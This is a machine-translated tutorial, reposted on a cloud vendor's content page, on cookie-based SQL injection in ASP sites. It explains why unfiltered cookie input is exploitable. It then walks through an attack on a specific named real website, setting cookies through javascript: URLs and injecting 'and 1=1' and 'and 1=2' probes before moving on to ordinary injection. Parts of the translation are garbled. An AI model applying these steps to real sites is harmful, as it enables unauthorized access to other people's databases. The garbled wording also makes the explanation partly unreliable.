Cookie SQL injection

Source: Internet
Author: User
Tags sql injection

Transfer from http://blog.sina.com.cn/s/blog_6b347b2a0101379o.html

The principle of cookie injection is the same as normal injection, except that we submit the parameters of the cookie has been submitted, and the general injection we use GET or post to submit, get the way to submit is directly after the URL to add the need to inject the statement, post is through the form , the difference between get and post is that we can see the arguments we submitted through the IE address bar, while the other one can't.

In the case of post and get injection, the cookie injection is a bit more cumbersome, and to make a cookie injection, we first have to change the cookie, and here we need to use the JavaScript language. In addition, there are two necessary conditions for the formation of cookie injections,

Condition 1: The program filters the data submitted by the Get and post methods, but does not filter the database submitted by the cookie.

Condition 2: On the basis of condition 1, it is also necessary for the program to submit data acquisition method is direct request ("XXX") way, does not indicate the use of the request object to obtain the specific method.

1, first open http://www.st3yy.com/experts_info.asp?id=128, and so on after the page completely opened, we will empty the IE address bar

2, in the blank address bar, fill in, the following content
Javascript:alert (document.cookie= "id=" +escape ("128"));

( " id=" here is"id=" in "http://www.st3yy.com/experts_info.asp?id=128", "Escape" ("128") "128"in "http://www.st3yy.com/experts_info.asp?id=128" in the "id=218", these two should be specific according to the data obtained to decide.

3, took the second step, open another window, try to access the http://www.st3yy.com/experts_info.asp? (both "id=128" is removed), and then see if it will be accessible normally.

4, from can see, with previously visible access after the page with access to http://www.st3yy.com/experts_info.asp? The id=128 effect is the same.

as you can see from here, the program does not specify what method to use to obtain the data using the request object, but instead uses the request ("XX") directly.

An important factor in the formation of cookies is now clear.

5, the third step, test whether the transfer of special characters to see whether the program to filter the data. Let's go back to the page where we just changed the cookie, and then fill in the IE Address bar

Javascript:alert (document.cookie= "id=" +escape ("and 1=1");

6, see if the page is normal, if normal we re-submit

Javascript:alert (document.cookie= "id=" +escape ("and 1=2");

7. The next work is the same as get post injection.

Cookie SQL injection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.